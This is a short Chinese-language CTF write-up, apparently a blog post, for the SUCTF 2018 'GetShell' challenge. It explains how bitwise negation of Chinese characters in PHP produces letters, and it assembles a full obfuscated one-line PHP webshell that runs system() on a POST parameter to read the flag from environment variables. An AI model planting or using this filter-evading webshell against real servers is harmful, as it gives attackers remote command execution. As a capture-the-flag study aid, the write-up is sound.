[suctf2018]GetShell
参考p神利用取反来获取可用字符:
1
2
3
4
5
6
7
8
9
10
11
| <?php
error_reporting(0);
$a = ~垂;
echo $a."\n";
echo $a[1];
/*
运行得:
a}
a
*/
?>
|
🐎一下汉字:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| echo ~茉**[**$____**]**;//s
echo ~内**[**$____**]**;//y
echo ~茉**[**$____**]**;//s
echo ~苏**[**$____**]**;//t
echo ~的**[**$____**]**;//e
echo ~咩**[**$____**]**;//m
echo ~课**[**$____**]**;//P
echo ~尬**[**$____**]**;//O
echo ~笔**[**$____**]**;//S
echo ~端**[**$____**]**;//T
echo ~瞎**[**$____**]**;//a
|
构成🐎,POST参数a:
1
| <?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;$___($__________[~瞎[$____]]);
|
用env访问环境变量获得flag:
参考自:https://www.shawroot.cc/1856.html
Author:
odiws
Permalink:
http://odiws.github.io/2024/06/19/2018-GetShell/
License:
Copyright (c) 2019 CC-BY-NC-4.0 LICENSE
Slogan:
Do you believe in DESTINY?